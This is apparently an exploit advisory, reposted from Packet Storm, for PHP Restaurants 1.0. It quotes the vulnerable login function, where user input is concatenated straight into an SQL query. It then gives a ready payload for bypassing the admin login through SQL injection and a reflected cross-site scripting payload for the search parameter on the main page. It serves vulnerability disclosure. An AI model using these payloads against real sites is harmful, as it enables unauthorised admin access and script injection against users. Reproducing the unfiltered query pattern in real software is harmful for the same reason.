Exploit for PHP Restaurants 1.0 SQL Injection / Cross Site Scripting

## https://sploitus.com/exploit?id=PACKETSTORM:172040
# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross  
Site Scripting  
# Google Dork: None  
# Date: 4/26/2023  
# Exploit Author: Or4nG.M4n  
# Vendor Homepage: https://github.com/jcwebhole  
# Software Link: https://github.com/jcwebhole/php_restaurants  
# Version: 1.0  
  
  
functions.php  
  
function login(){  
global $conn;  
$email = $_POST['email'];  
$pw = $_POST['password'];  
  
$sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` =  
'".md5($pw)."'"; <-- there is No filter to secure sql query  
parm[email][password]  
$result = $conn->query($sql);  
if ($result->num_rows > 0) {  
while($row = $result->fetch_assoc()) {  
setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day  
header('location: index.php');  
}  
} else {  
header('location: login.php?m=Wrong Password');  
}  
  
}  
  
login bypass at admin page /rest1/admin/login.php  
  
email & password : ' OR 1=1 -- <- add [space] end of the payload  
  
cross site scripting main page /index.php  
  
xhttp.open("GET", "functions.php?f=getRestaurants<?php  
if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here we  
can insert our xss payload  
?>  
", true);  
xhttp.send();  
  
</script> <-- when you insert your'e payload don't forget to add </script>  
like  
  
xss payload : </script><img onerror=alert(1) src=a>